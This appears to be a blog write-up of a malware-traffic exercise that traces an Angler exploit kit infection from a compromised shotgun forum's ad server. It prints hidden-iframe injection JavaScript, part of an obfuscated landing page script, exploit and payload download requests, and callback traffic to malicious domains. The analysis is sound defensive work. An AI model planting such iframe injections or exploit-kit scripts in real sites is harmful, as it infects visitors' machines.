Malware Exercise 2015-11-24 Goofus and Gallant

So this one has a great comical backstory – how the user (ironically from the SOC) Tom brought his personal laptop in and managed to get his system infected while looking for a shotgun to go hunting with. Outside of making me and one of my co-workers laugh at the scenario (and then another one asking if this could be based on a real event – lol), there is one thing that I learned from this and it was from reading the answers. Brad explains how he went about finding the start of the infection chain from working backwards using the filter of “ip contains [whatever the EK domain is] ” in Wireshark and keep going up the chain until you get to the start. I will have to remember this for my everyday work as well. Generally, I end up finding the end of the infection chain, and just using the “referer” from the TCP Stream to point me into the right direction. Definitely good to know to say the least.

I also did not know that “Bedep” will drop encrypted binaries onto the system via memory and NOT onto the disk. For more information about this, @Kafeine has more information about this here.

Lastly, since the malicious files were encrypted, I was not able to run them on my test VM. But I do have them along with all the other artifacts from my investigation located on my GitHub page found here.

Basic Questions to Answer About Exercise:
=========================================

– Date and time of the activity.
> First Packet: 2015-11-24 10:13:42 / Last Packet: 2015-11-24 10:22:23 / Elapsed Time: 08:41

– The infected computer’s IP address.
> 10.1.25.119

– The infected computer’s MAC address.
> a4:1f:72:a6:9c:1b

– The infected computer’s host name.
> Turkey-Tom

– Domains and IP addresses of any infection traffic with VT detection ratio.
> 52.22.18.194:843 | 0 / 55
> 52.21.140.191:843 | 0 / 56
> 64.34.173.208 | www.showtgunworld.com | 1 / 66
> 162.216.4.20 | neuhaus-hourakus.avelinoortiz.com | 2 / 66
> 166.78.145.90 | rnhbhnlmpvvdt.com | 8 / 66
> 151.80.126.226 | chin.truffleman.co.uk | 1 / 66
> 95.211.205.229 | ncqauqvqqhhzpc.com | 1 / 66

– DNS requests noted during the investigation:
> 11981 176.540744 10.1.25.119 63767 8.8.4.4 53 DNS Standard query 0x2749 A jtikbwiyllxnyi61.com
> 11983 176.819935 8.8.4.4 53 10.1.25.119 63767 DNS Standard query response 0x2749 No such name
> 11984 176.821924 10.1.25.119 60109 8.8.4.4 53 DNS Standard query 0xc23c A ghgmtcrluvghlwc91.com
> 11988 176.915258 8.8.4.4 53 10.1.25.119 60109 DNS Standard query response 0xc23c A 127.0.1.1
> 11989 176.926720 10.1.25.119 58168 8.8.4.4 53 DNS Standard query 0x5cc3 A ghgmtcrluvghlwc91.com
> 11990 177.005193 8.8.4.4 53 10.1.25.119 58168 DNS Standard query response 0x5cc3 A 127.0.1.1
> 11997 178.041367 10.1.25.119 57199 8.8.4.4 53 DNS Standard query 0x043c A qidxwsfqblej.com
> 11998 178.171919 8.8.4.4 53 10.1.25.119 57199 DNS Standard query response 0x043c No such name
> 11999 178.173503 10.1.25.119 58882 8.8.4.4 53 DNS Standard query 0xdad5 A lnhxwmhoyjxqmtgn9u.com
> 12000 178.254598 8.8.4.4 53 10.1.25.119 58882 DNS Standard query response 0xdad5 A 127.0.1.1
> 12001 178.268719 10.1.25.119 52742 8.8.4.4 53 DNS Standard query 0x1cf7 A lnhxwmhoyjxqmtgn9u.com
> 12002 178.348164 8.8.4.4 53 10.1.25.119 52742 DNS Standard query response 0x1cf7 A 127.0.1.1
> 12040 179.351621 10.1.25.119 53261 8.8.4.4 53 DNS Standard query 0xf345 A hsgxnjpdzifkjl4r.com
> 12068 179.449632 8.8.4.4 53 10.1.25.119 53261 DNS Standard query response 0xf345 No such name
> 12073 179.452374 10.1.25.119 62977 8.8.4.4 53 DNS Standard query 0x57eb A xwhrskktvevezz0.com
> 12112 179.540378 8.8.4.4 53 10.1.25.119 62977 DNS Standard query response 0x57eb No such name
> 12113 179.542265 10.1.25.119 50010 8.8.4.4 53 DNS Standard query 0x2997 A rnhbhnlmpvvdt.com
> 12158 179.651092 8.8.4.4 53 10.1.25.119 50010 DNS Standard query response 0x2997 A 166.78.145.90
> 12163 179.663157 10.1.25.119 50005 8.8.4.4 53 DNS Standard query 0xb4c8 A rnhbhnlmpvvdt.com
> 12194 179.748103 8.8.4.4 53 10.1.25.119 50005 DNS Standard query response 0xb4c8 A 166.78.145.90
> 12303 179.968038 10.1.25.119 61287 8.8.4.4 53 DNS Standard query 0xb54b A qtllebdadvitdim.com
> 12334 180.059365 8.8.4.4 53 10.1.25.119 61287 DNS Standard query response 0xb54b No such name
> 12335 180.060984 10.1.25.119 56286 8.8.4.4 53 DNS Standard query 0x9da2 A wyvpeiyaxycznuia6.com
> 12372 180.155660 8.8.4.4 53 10.1.25.119 56286 DNS Standard query response 0x9da2 No such name
> 12373 180.157299 10.1.25.119 49396 8.8.4.4 53 DNS Standard query 0xb029 A ncqauqvqqhhzpc.com
> 12411 180.238941 8.8.4.4 53 10.1.25.119 49396 DNS Standard query response 0xb029 A 95.211.205.229
> 12415 180.252274 10.1.25.119 51862 8.8.4.4 53 DNS Standard query 0x7ebc A ncqauqvqqhhzpc.com
> 12453 180.348244 8.8.4.4 53 10.1.25.119 51862 DNS Standard query response 0x7ebc A 95.211.205.229
> 13636 193.071344 10.1.25.119 55508 8.8.4.4 53 DNS Standard query 0x8551 A chin.truffleman.co.uk
> 13637 193.272985 8.8.4.4 53 10.1.25.119 55508 DNS Standard query response 0x8551 A 151.80.126.226

– Information about malware found on the infected host.
> The malware associated with this infection looks to be related to Angler EK starting with a Flash exploit.

– The root cause (what is the likely cause of the infection noted in the pcap).
> The root cause for this infection is from a compromised website (shotgunworld[.]com) with a malicious ad that redirects the end-user to the Angler EK page.

Notes about investigation:
==========================
Looks like the host “hxxp://www[.]shotgunworld[.]com” is the initial site that is compromised via what looks to be a malicious Javascript ad off the shotgunworld site (mind you that this is a hidden iframe from what I can tell):

	GET /adserver/www/delivery/ajs.php?zoneid=1&withtext=1&cb=99806861739&charset=utf-8&loc=http%3A//www.shotgunworld.com/&referer=http%3A//www.google.com/url%3Fsa%3Dt%26rct%3Dj%26q%3D%26esrc%3Ds%26source%3Dweb%26cd%3D1%26sqi%3D2%26ved%3D0ahUKEwiKnu-0uqnJAhUIWD4KHal9DUcQFggcMAA%26url%3Dhttp%253A%252F%252Fwww.shotgunworld.com%252F%26usg%3DAFQjCNEURWbI-lwIgSRkGqiR9ALrodRMUw%26bvm%3Dbv.108194040%2Cd.dmo HTTP/1.1
	Accept: application/javascript, */*;q=0.8
	Referer: http://www.shotgunworld.com/
	Accept-Language: en-US
	User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
	Accept-Encoding: gzip, deflate
	Host: www.shotgunworld.com
	Connection: Keep-Alive
	Cookie: OAID=380cc1bbe19b8e1255013f1f986ddebe; OAVARS[abf85608]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22oadest%22%3Bs%3A26%3A%22http%3A%2F%2Fwww.gueriniusa.com%2F%22%3B%7D; __utma=249653828.1397841079.1448381776.1448381776.1448381776.1; __utmb=249653828.3.10.1448381776; __utmc=249653828; __utmz=249653828.1448381776.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __utmt_UA-44006917-3=1; __utmt_UA-24085258-3=1; __utmt_UA-17979443-1=1

	HTTP/1.1 200 OK
	Date: Tue, 24 Nov 2015 16:16:24 GMT
	Server: Apache/2.2.3 (CentOS)
	X-Powered-By: PHP/5.1.6
	Pragma: no-cache
	Cache-Control: private, max-age=0, no-cache
	Expires: Mon, 26 Jul 1997 05:00:00 GMT
	P3P: CP="CUR ADM OUR NOR STA NID"
	Set-Cookie: OAID=380cc1bbe19b8e1255013f1f986ddebe; expires=Wed, 23-Nov-2016 16:16:24 GMT; path=/
	Content-Length: 1479
	Connection: close
	Content-Type: text/javascript; charset=utf-8

	var OX_7f561e63 = '';
	OX_7f561e63 += "<"+"iframe style=\"position:absolute;left:-3060px;top:-4000px;width:360px;height:357px;\" src=\"http://solution.babyboomershopping.org/respondents/header.js\"><"+"/iframe><"+"a href=\'http://www.shotgunworld.com/adserver/www/delivery/ck.php?oaparams=2__bannerid=3__zoneid=1__cb=0d1dc4c39c__oadest=http%3A%2F%2Fwww.americhoke.com\' target=\'_blank\'><"+"img src=\'http://www.shotgunworld.com/AmerichokeBanner.gif\' width=\'468\' height=\'60\' alt=\'Americhoke\' title=\'Americhoke\' border=\'0\' /><"+"/a><"+"br /><"+"a href=\'http://www.shotgunworld.com/adserver/www/delivery/ck.php?oaparams=2__bannerid=3__zoneid=1__cb=0d1dc4c39c__oadest=http%3A%2F%2Fwww.americhoke.com\' target=\'_blank\'>Choke tube installation  barrel porting  adjustable combs<"+"/a><"+"div id=\'beacon_0d1dc4c39c\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://www.shotgunworld.com/adserver/www/delivery/lg.php?bannerid=3&amp;campaignid=3&amp;zoneid=1&amp;loc=http%3A%2F%2Fwww.shotgunworld.com%2F&amp;referer=http%3A%2F%2Fwww.google.com%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3D%26esrc%3Ds%26source%3Dweb%26cd%3D1%26sqi%3D2%26ved%3D0ahUKEwiKnu-0uqnJAhUIWD4KHal9DUcQFggcMAA%26url%3Dhttp%253A%252F%252Fwww.shotgunworld.com%252F%26usg%3DAFQjCNEURWbI-lwIgSRkGqiR9ALrodRMUw%26bvm%3Dbv.108194040%2Cd.dmo&amp;cb=0d1dc4c39c\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
	document.write(OX_7f561e63);
	

Once the connection is made from ‘solution[.]babyboomershopping[.]org’ I see that there is another redirect made to the site ‘neuhaus-hourakus[.]avelinoortiz[.]com/’:

	GET /respondents/header.js HTTP/1.1
	Accept: text/html, application/xhtml+xml, */*
	Referer: http://www.shotgunworld.com/
	Accept-Language: en-US
	User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
	Accept-Encoding: gzip, deflate
	Host: solution.babyboomershopping.org
	Connection: Keep-Alive

	HTTP/1.1 200 OK
	Server: nginx
	Date: Tue, 24 Nov 2015 16:18:32 GMT
	Content-Type: text/html; charset=utf-8
	Transfer-Encoding: chunked
	Connection: keep-alive
	X-Powered-By: PHP/5.3.3

	c0
	<iframe style="position:absolute;left:-3311px;top:-3861px;width:309px;height:326px;" src="http://neuhaus-hourakus.avelinoortiz.com/forums/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29"></iframe>
	0
	

Once the connection has been made to ‘neuhaus-hourakus[.]avelinoortiz[.]com,’ it looks like it lands the user to an Angler EK landing page since it has that tell-tale page of quotes and scripts spread throughout:

	GET /forums/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29 HTTP/1.1
	Accept: text/html, application/xhtml+xml, */*
	Referer: http://solution.babyboomershopping.org/respondents/header.js
	Accept-Language: en-US
	User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
	Accept-Encoding: gzip, deflate
	Host: neuhaus-hourakus.avelinoortiz.com
	Connection: Keep-Alive

	HTTP/1.1 200 OK
	Server: nginx/1.8.0
	Date: Tue, 24 Nov 2015 17:13:18 GMT
	Content-Type: text/html
	Content-Length: 94921
	Connection: keep-alive

	<!DOCTYPE html>
	<html>
	<head>

	<title>
	you something that might you,
	</title>
	</head>
	<body>
	<strike>
	  "How horrid all this tumbling about and I believe I have borne with calmness, and she dared not follow her to accept your invitation here?"-- "It was my comfort.
	</strike>
	<ol>
	  Yet, though smiling to see them once;
	 <u>
	  <em>
	   " This however was not very likely." "Well, and whose possessions he was monstrous happy, and rather better pasturage for their ease and enjoyment, and only prevented from being her relations too made it appear that she had hoped to be to
	  </em>
	   might at present confess to her own composure of voice, under which was exactly the reverse of her mind might be found when the life of sin. Her legal allowance was not in the and
	 </u>
	 <ol>
	   A man must pay for his intrusion on that head. The would probably have passed without suspicion, had he married you, he have
	  <i>
	    s delicate, enquiries
	  </i>
	 </ol>
	 <form>
	   Their opportunity of introducing it, and on misters They's suggestion; and humoured
	 </form>
	</ol>
	<div style=" width:8px; height:18px;"><p  ui ="I3Zj-#qm1pQOPHiOOprmDg">wd['p]i' mO wwhno'V=u ncia'x( nio1t;fWxtv{ard ) wetnaT &nbsp; = e)e; aDa et arDvt(pmtlu; op et {D =dnlmtawn Dt}=hw)( e a e ; t mpadl e eatiDe( -t;T }fo escnnu&lt; x)it btas(iDwo{ n)teaaw dOpmV];'ni = &nbsp;['hw''wo[vg'ro ;= u]dWw't e &nbsp;= awaodesilvfrt ;nWvbaM=.niLj cwufO jwv.OWasow cM udbwfLj=.ofvWjn 1uaLbiOdwcMfdiowfu LjWOMv=.wnabct=; &nbsp;i2s nuoff} &nbsp;tcnruy( dt'[w o{e)Qeniw]F =t}tnueu rr x' ;f oxTxet {l()tceinni e sut,arr = &nbsp;vlrr""al=in.(y..ta/mae &nbsp;hc( )fo i/0 av ()rg; r= &nbsp;arag &nbsp;;l.ty;ri&lt;neh{) rs=+rttl uie+ + Sr.omhenraCr(aiCgfdop(nara e/)i[3ysrIt,]2 &nbsp; rte)tlnrsu2e;}r ua r cd mu Loj;M}v =ce.tEeyn"(neImeltgBtdcu") &nbsp;bep1c"GW,aM= pc 2=iG"= "dcln",G ;1+1"dhnGoi ;c" Cc uftuTe(, &nbsp; r)rv nsxr{ ae w m; o.eg axI=n)(x a= ;clx .x &nbsp;nrodrs=st);MaecGLj"cT x("[+]c(x;r+;0ern 1)G2ut nfctou}fpx en i urT_) &nbsp;{x'fa6ur7T( ,r(e4uk2u606u65k7374325o4246q0oe676c6462766iagg3gc 0,f5i+22327'o x;Treark37'7( u) 6466u3kouu477065252464e0q4ci62 '6o5666627aor,);}t &nbsp;nufi + f cnoVu(){nTgifia x re( vurseAitxenengaro..tdS'IE)1f &amp;== &nbsp;O'(M- &amp;aito.ranoppsanrvgeVixdOf'ni)'irtT.(need/1 ) &nbsp;n= }te;r {=-ru ! !wn_iD_woId if(_.ELOBA_LVOCNOECERTOOS__NLIE'MRB||_ MNAD( _TEOOSOWS_OCL_OLSRSNENFC'idF))w onA EUniwDeatb; tees a{ast)(s(r);r;u &nbsp;ut eQ eynr}v x,xKaep= a0v rk' sIyeVrtsKl+ u'rik.' a'o +'gyJ.Pdire baulnrsipA v= 'ixpatac, 1 &nbsp;x2= x'10x' &nbsp; 0,+ . x= 04,0_ +_ &nbsp;x 3.'5t;ry{=1wevk &nbsp;. ' &nbsp;xnvteXbxA ;ce1j Oci(t)wd.seei }t ;=w2nour (ce){=alavk &nbsp;c th xfr y &nbsp; e wxvnks{;t= eeiXOj2c} tc)eAbtvx(;ht(e &nbsp;cafk ={ )acxv t;ry{=swevk &nbsp;l e &nbsp;xnvteXbxA ;ce3j Oci(t)cah()x f &nbsp;{ &nbsp;}ectvk= ewidelrt.w=oans;1s &nbsp; } &nbsp;ve{ fix u};}k()attaa sQt(ess beD;)e)y; e ev ru}turr(;n a tha[rc4 a tad p ='886oaoii63447666654co86a4g8u26s6267667aau626626,'343323323a4qc7e2o'q46457 6545ac426a0ue67686572676uo0842a6os6686757554uuc666sas627a2662576gu6u34ce4' 3a'333223c,eq624cce75a4657475oqa4208o2o56u7665766u6207a8u8s64u66575466s6c2sau6436g2756762a66630i,uu43i 32323'c'626oai4875o7576666c4o244ueaa62g77766640a0842886u6686676727iio67as6ss26i7666757s8ag2u66a23243362762u2',502o0a6646736' 62oo6502ooa66467667562o0658u6o246u5666727ooo06i6i0s67266767668u6o6a8u6267a67775750sci6aom8a66u2676676usua2644g832u327362360f;or( &nbsp;;0ra=v' ] i &nbsp;p&lt;atdeihtatna h &nbsp;l.g)+ xr( ht_epu;T+ifpaia],sra ;Qtyed t[eu)ahta=;af un &nbsp;p tdll}otn T)nv eu ruxci(A{2 &nbsp;="2r074o75a &nbsp;k6m6646mi2ao5406267776o46270amm027477466766i k= 46,5qs6i2"" 387277a7246 =,"00c6i4k &nbsp;768677450s684"aisa6276a7626 ,870i64a6i7" &nbsp;"56645087ouk81=26276a7626 ,870i64a6i7" &nbsp;"55"44k45,ak02=a4 4 6554 2o652i34="8545 &nbsp;="g"o67o650 ,k66aga2s8uo436o2666672o626304 u5" ,="23236k 66633662os2o4o8qc86623u2332"ec3c4u664a33hadaa' 26 =4 ,tpt [q2e74a8o67746666767ias278i20e74q6226466qoa45oqq2g76466667662a8s6oo48432u22762636u,4 'qe0476266343'7o2i478a2a872667666740sqq62o4io56e67662472ais6s60aa63023776630sua264igm44u5273624862q4eaqio6 ,6'44444"2426a4ae027i7776676868s6iq02u67a6442677goo86q4sig7626666752aa6u34u0a" 34"3622230,o27e24q87647746666ai0642sqag7684766722iauo6i840a66o6577666q2ga6auus0336322267244",4q222a67o7636" 6e48i6a6s4i640726777628ga70o8qa76u5626477iosi760ssg73063636620a6u34u6ai4484462225ime24a,4qs65'6 4"4478aq06i6o8i6645766245u8s26ia88645q6677665oqcs6ieouu26s62666668ou4266i6,'303323323i8486asq'662866 65740iou58is4a76867766562i8o6q68qq67i67655576aag66me6866i2646666ssuo2646oi32u326362360,8 k +ic3k &nbsp;+323' 3'006cuess62467263250ieu76048676e6562677um826iu 8,57s+67667'6k &nbsp;k3+sk '3'3 &nbsp; 2+2c0k,2 &nbsp;'ks2 33k++5 &nbsp;+ek 5,k30' + &nbsp;23 '+k +003i k4 +6k2+3'33 , '+340 3,632+3k3 &nbsp;'0k &nbsp;k3+0k233'3 &nbsp; 2+342c27kmoo86642756676ssuo2644oo44u426362442 &nbsp;k2+ o343k' 4 ',+ 353o73+3 ,c3kg0g24 '6k+3 &nbsp;3256432'k+ &nbsp;03333c'+27k ,6 ko ggk +3 2323 7o030s38+'s25'3 +6+3 3k &nbsp;,gkgc 2k33a235 3gs2o0+s'2037+'k6 k3 + 23kg,c &nbsp;+ 23s32733g23gs'02ao536+, 2 '3' ++ ck k3k 3202333'co5g42sasg73 6k2+++c34k &nbsp; &nbsp;k, 0' 0+k, s 02kk 253'+ 423s3' &nbsp;+ k+k +0'e,52+0 '4ikk+30'3 34 30 &nbsp;k+ 43,30+ 406k 2' 3+'k6 k3+ &nbsp;24k2,0 &nbsp;+004322c'm66o75 33372kos2s8u4436o2676662o64442o u+ 'ok42444, 2+0 '44kg73053 34 32o c+k, g 02kk 363'+ 4330333 'co5g6+2'4g73 6k2+++234k &nbsp; &nbsp;k, 0'0s2s0g8 '7o3533233gck,2 &nbsp; k3204'k++6 + 323s3532+ g7coa0s0g3'2 &nbsp;+k'6a3 034k ,k +2s032ocsk+3g'725323g &nbsp;k+ 43,2a+ 206k 2' 332457'36kg3 gso0sc3++2 k12 s2 +3 ,4k 3'80s5og 0,63g+33723'ck &nbsp;k4 3k3s' a+ 12+23253o73+2 ,c3kg0gs0 '6k+41+a2033'2 k &nbsp; 32so27ggksk 'c632335+ ,4 1 &nbsp;2 2023s'2++ka3375g33632k ',csg4ok+ 2k +'s+o53032 &nbsp; 4240cg' k g4k ,+67+332k 2 0327 3g03gs26+'o536+, 23'' &nbsp;+ &nbsp;ck k4k+0s5og 6,63g+33723'ck &nbsp;k4 ;kro6k + 22+] f ai &nbsp;&lt;(ta ; 0 =vr ip.tleg+dx ;hithnaa+ )pef(aar,]dh[tTpu_taiattaaks =)e2s beD ; k=40==3244k &nbsp;k &nbsp; &nbsp;1k3k =k6=p = &nbsp;5 &nbsp; 4k =tda &nbsp; tTxlu}na=ha;l )V; T)uWxeu;rrxe((A 4(00; i &nbsp; &nbsp; &nbsp;a)t1 &nbsp; </p>
	<form>
	

Angler EK page

From here I can see a POST back to the site – most likely passing stats about the system to craft the correct exploit:

	POST /forums/fiscal.hypetemplate?machine=0erT2JL5&idea=bAtrR&oh=&other=4vm3vmKv&woman=&shoot=gN9eEjH&process=f2r-BDMy&minute=&larger=kST8&difficult=WgR0Lms5 HTTP/1.1
	Accept: */*
	Content-Type: text/html; charset=utf-8
	Referer: http://neuhaus-hourakus.avelinoortiz.com/forums/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29
	Accept-Language: en-US
	Accept-Encoding: gzip, deflate
	User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
	Host: neuhaus-hourakus.avelinoortiz.com
	Content-Length: 188
	Connection: Keep-Alive
	Cache-Control: no-cache

	cEZQAoBD1JC2osm3oFWTx6csMwLYXl+8RNz2OEKzknDTEKBSkw4/mlx1gN/345+/pYTRuM5b/246rNtClafKXD4ry38xe+d968qKHE/Uo26gHKN5w+cOrO0lxSquj/PE41q2pvRFKl4MIpPiN1uaJg7lsHGCoUcbJgmQPqmO2CBlBK+6zgUxNzg0MA==HTTP/1.1 200 OK
	Server: nginx/1.8.0
	Date: Tue, 24 Nov 2015 17:13:21 GMT
	Content-Type: text/html
	Content-Length: 2384
	Connection: keep-alive
	

And here is the malicious Flash file:

	GET /who.olp?save=&effect=VFv9cHM&you=LmzXy&picture=J0sYyqN&why=Dv0ZsHPosOWnZsEC9KJ9myAYKZSGT HTTP/1.1
	Accept: */*
	Accept-Language: en-US
	Referer: http://neuhaus-hourakus.avelinoortiz.com/forums/viewforum.php?f=15&sid=0l.h8f0o304g67j7zl29
	x-flash-version: 19,0,0,207
	Accept-Encoding: gzip, deflate
	User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
	Host: neuhaus-hourakus.avelinoortiz.com
	Connection: Keep-Alive

	HTTP/1.1 200 OK
	Server: nginx/1.8.0
	Date: Tue, 24 Nov 2015 17:13:22 GMT
	Content-Type: application/x-shockwave-flash
	Content-Length: 75602
	Connection: keep-alive

	CWS
	#*..x....X.A.-
	.`............].....ACp.......w
	

And another POST to the server:

	POST /station.htm?again=&meet=wuzqI0&indeed=ypZLR7M&artist=&give=V_CvGhey&throw=&agreement=IWAIiztB-DCJSkcANq-qiph2Tah HTTP/1.1
	Accept: */*
	Accept-Language: en-US
	Referer: http://neuhaus-hourakus.avelinoortiz.com/who.olp?save=&effect=VFv9cHM&you=LmzXy&picture=J0sYyqN&why=Dv0ZsHPosOWnZsEC9KJ9myAYKZSGT/[[DYNAMIC]
	x-flash-version: 19,0,0,207
	Content-Type: application/x-www-form-urlencoded
	Content-Length: 196
	Accept-Encoding: gzip, deflate
	User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
	Host: neuhaus-hourakus.avelinoortiz.com
	Connection: Keep-Alive
	Cache-Control: no-cache

	xWRNDYEAqwYYwZ+peJN+So3iLI4/QWR/Z3+2aQkLn2RlsXwiqFOkyIbC1EWZuHWy1CwXdWfy+RfJh1cyIB9dOMCnPQoXtnlZlJOKDFFa85bHYiPt9q9iAnzuol+r63UCM1/u1X2tFaTTCi1Xked2sZIbqZgt6wuUqzLOo+28kb0VXiGBYGgKMTksMCwwLDIwNw==HTTP/1.1 200 OK
	Server: nginx/1.8.0
	Date: Tue, 24 Nov 2015 17:13:26 GMT
	Content-Type: text/html
	Content-Length: 5528
	Connection: keep-alive
	

And here is the site delivering the malicious binary files to the user’s system:

	GET /literature.disco?audience=5Hr&trip=&election=txK1BgKFW&piece=aRLmxzX&normal=QGOT&understand=IWOBe&theory=so8bghs&discover=y47E5&tell=gSIQ&opportunity=ZWe&available=z HTTP/1.1
	Connection: Keep-Alive
	Accept-Language: en-EN
	Host: neuhaus-hourakus.avelinoortiz.com

	HTTP/1.1 200 OK
	Server: nginx/1.8.0
	Date: Tue, 24 Nov 2015 17:13:27 GMT
	Content-Type: application/octet-stream
	Content-Length: 660972
	Connection: keep-alive

	-----

	GET /yes.wbxml?unite=tXu9a5tJI&writer=J7y8dCR8F&describe=LzQOS9&for=&note=C26Z8129ea&number=gcsXv8v&next=2unI-c8 HTTP/1.1
	Connection: Keep-Alive
	Accept-Language: en-EN
	Host: neuhaus-hourakus.avelinoortiz.com

	HTTP/1.1 200 OK
	Server: nginx/1.8.0
	Date: Tue, 24 Nov 2015 17:13:31 GMT
	Content-Type: application/octet-stream
	Content-Length: 660972
	Connection: keep-alive
	

– Once the files have been downloaded from the above connection and installed, we see the malware trying to connect to two different IP addresses (52.22.18.194 / 52.21.140.191) on port 843. One thing that we can see is that the connection to these IP addresses are blocked since we only see the SYN packet being sent and no response from the other end:

Calls to port 843 on remote system

Once again I am reminded of why it is a good idea to block any outbound connections except for well known ports (80/443/465/995/etc…) and having the logs for any/all of that traffic. Granted one then needs to be able to ingest those logs and make sense of them as well. And don’t for get about your exceptions and having an exception process!

And now for the call-backs from the malware that was deposited on the system:

	POST /include/class_dm_event.php HTTP/1.1
	Connection: Keep-Alive
	Accept: text/html, application/xhtml+xml, */*
	Accept-Language: en-US
	User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
	Content-Length: 263
	Host: rnhbhnlmpvvdt.com

	ogis0=uq+2TOoO36/E3djA7FAY+qOQp6njry09&e=3HcbGddeYpGhIaiiCgDfit2Ka6pwf9z6U9SV&oaqe=Yr7rA6V7flvNGrf/TshfqMLu0k6Bvq3tSPELVxAJkdC65dMe&oumkmm1=AmLf8T37jecJCNXacLepDLfFjH1UivyisxI5XCUaa2zjQ9meadjT8qdYm+fj&y=nrOdI1OUNk+70KCnnMpGUpEo7syABmmqvaGuLIvDIq2fMn41gBBeaYeVvW0=

	HTTP/1.1 200 OK
	Date: Tue, 24 Nov 2015 16:17:22 GMT
	Server: Apache/2.2.20 (Ubuntu)
	X-Powered-By: PHP/5.3.6-13ubuntu3.10
	X-Sinkhole: malware-sinkhole
	Vary: Accept-Encoding
	Content-Length: 0
	Keep-Alive: timeout=1
	Connection: Keep-Alive
	Content-Type: text/html
	

Interestingly enough, we can see a couple of POST requests being made to the server, but the response made from the server has the CONTENT-TYPE of “application/octet-stream.” Since this is the response from the server, I do not believe that these are binary files at this time:

	POST /include/functions_newpost.php HTTP/1.1
	Connection: Keep-Alive
	Accept: text/html, application/xhtml+xml, */*
	Accept-Language: en-US
	User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
	Content-Length: 277
	Host: ncqauqvqqhhzpc.com

	skgkmuq=2NKRclhTaaVcZfcfyHVUbhwfSld0Zju7&ewueoc=PswwbVqsNwbSgcqfG6gImfag&c=9JK1TVsiirO56TNCRSpf9LksdgM7&msmui=lBJh+rlt3H8VdbhdKI0280o2&y0=2qPbVGijLyJymtapuwZaLfNm7Kgmj5GtWigUmWGFfOqZ&k=/A+hPvXyhmaoXk/ARfa6o/7Q7OhyrnOoFe3+Ocq/dvhHHXzRR3e/&mgacue=b/1tQDvJswplB85kjSLVc4kED+uPy2U=

	HTTP/1.1 200 OK
	Server: nginx
	Date: Tue, 24 Nov 2015 16:16:42 GMT
	Content-Type: application/octet-stream
	Content-Length: 587
	Connection: keep-alive
	Set-Cookie: PHPSESSID=9b6f301d3b6400079694d341333b6959; expires=Wed, 25-Nov-2015 16:16:42 GMT
	Set-Cookie: walkover=6258; expires=Wed, 25-Nov-2015 16:16:42 GMT
	Set-Cookie: rigidity=7597; expires=Wed, 25-Nov-2015 16:16:42 GMT
	Set-Cookie: staunching=4382; expires=Wed, 25-Nov-2015 16:16:42 GMT

	-----

	POST /newthread.php HTTP/1.1
	Connection: Keep-Alive
	Accept: text/html, application/xhtml+xml, */*
	Accept-Language: en-US
	Referer: http://lnhxwmhoyjxqmtgn9u.com/search.php
	User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
	Content-Length: 214
	Host: ncqauqvqqhhzpc.com

	moycq=uskrE77T5r1UtuRf&esuyuc=5EogXNdl7mULw6YgehMEBu4n&eicww5=JN8vwWDSDeUquJeK&my=QgXKqX/MgvVEp/o1IfmO&we=sfFo65FUZ5QDgmswsUkkj2Fg&wkmekkc=UZDILSO9ndxh/s7z&m=N/0xqJ/9awqYtpKpX6eb6939K4FBS4Qy0au/Zwn3IbHiS9IQjG3yN7M=

	HTTP/1.1 200 OK
	Server: nginx
	Date: Tue, 24 Nov 2015 16:16:45 GMT
	Content-Type: application/octet-stream
	Content-Length: 671932
	Connection: keep-alive
	Set-Cookie: PHPSESSID=52f98d522ab4e44a8cf557ed9830dc51; expires=Wed, 25-Nov-2015 16:16:45 GMT
	Set-Cookie: zebra=5401; expires=Wed, 25-Nov-2015 16:16:45 GMT
	Set-Cookie: spittle=7253; expires=Wed, 25-Nov-2015 16:16:45 GMT
	Set-Cookie: saffrons=3122; expires=Wed, 25-Nov-2015 16:16:45 GMT
	Set-Cookie: revisiting=3533; expires=Wed, 25-Nov-2015 16:16:45 GMT
	Set-Cookie: yogi=4911; expires=Wed, 25-Nov-2015 16:16:45 GMT

	-----

	POST /blog_ajax.php HTTP/1.1
	Connection: Keep-Alive
	Accept: text/html, application/xhtml+xml, */*
	Accept-Language: en-US
	Referer: http://ncqauqvqqhhzpc.com/newthread.php
	User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
	Content-Length: 996
	Host: ncqauqvqqhhzpc.com
	Cookie: yogi=4911; revisiting=3533; saffrons=3122; spittle=7253; zebra=5401; PHPSESSID=52f98d522ab4e44a8cf557ed9830dc51

